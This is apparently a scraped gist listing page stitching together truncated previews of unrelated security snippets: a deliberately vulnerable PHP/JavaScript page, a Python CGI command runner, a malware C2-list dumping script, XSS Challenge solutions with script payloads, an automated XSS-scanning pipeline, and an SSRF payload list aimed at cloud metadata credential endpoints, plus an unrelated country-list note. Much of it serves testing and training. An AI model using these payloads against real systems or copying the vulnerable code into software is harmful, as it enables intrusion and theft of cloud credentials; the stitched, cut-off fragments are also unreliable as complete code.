This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<!-- Vulnerable Code--> | |
<html> | |
<body> | |
<script> | |
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>"); | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import cgi | |
import subprocess | |
import cgitb | |
cgitb.enable() | |
def run(command): | |
if not command: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import struct | |
def dump_c2_list(c2_list): | |
for i in range(0xFFFFFF): | |
ip = Dword(c2_list + (i*8)) | |
if ip == 0: | |
break; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" standalone="no"?> | |
<!DOCTYPE svg PUBLIC | |
"-//W3C//DTD SVG 1.1//EN" | |
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> | |
<svg width="200" | |
height="200" | |
zoomAndPan="disable" | |
xmlns="http://www.w3.org/2000/svg" | |
xmlns:xlink="http://www.w3.org/1999/xlink" | |
xml:space="preserve"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hey All, | |
I am P.B.Surya.Subhash, a 17 Year coder,hacker and a student. | |
Recently I happen to see so many posts regarding this " Google XSS Challenge " and i was fortunate enough to complete them.. | |
These are the solutions for the challenges ;) | |
############################################################################## | |
Level 1: Hello, world of XSS | |
https://xss-game.appspot.com/level1/frame | |
query=<script>alert('xss')</script> |
This list served quite some people but someone else did a better job since.
Go to https://github.com/umpirsky/country-list for a list in your language and format.
I've also compiled a list of nationalities
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#cat targets_urls.txt | |
http://testphp.vulnweb.com | |
## Command Line | |
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt | |
#tool used | |
#https://github.com/jaeles-project/gospider | |
#https://github.com/tomnomnom/qsreplace |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## IPv6 Tests | |
http://[::ffff:169.254.169.254] | |
http://[0:0:0:0:0:ffff:169.254.169.254] | |
## AWS | |
# Amazon Web Services (No Header Required) | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" standalone="no"?> | |
<!DOCTYPE svg PUBLIC | |
"-//W3C//DTD SVG 1.1//EN" | |
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> | |
<svg width="200" | |
height="200" | |
zoomAndPan="disable" | |
xmlns="http://www.w3.org/2000/svg" | |
xmlns:xlink="http://www.w3.org/1999/xlink" | |
xml:space="preserve"> |
OlderNewer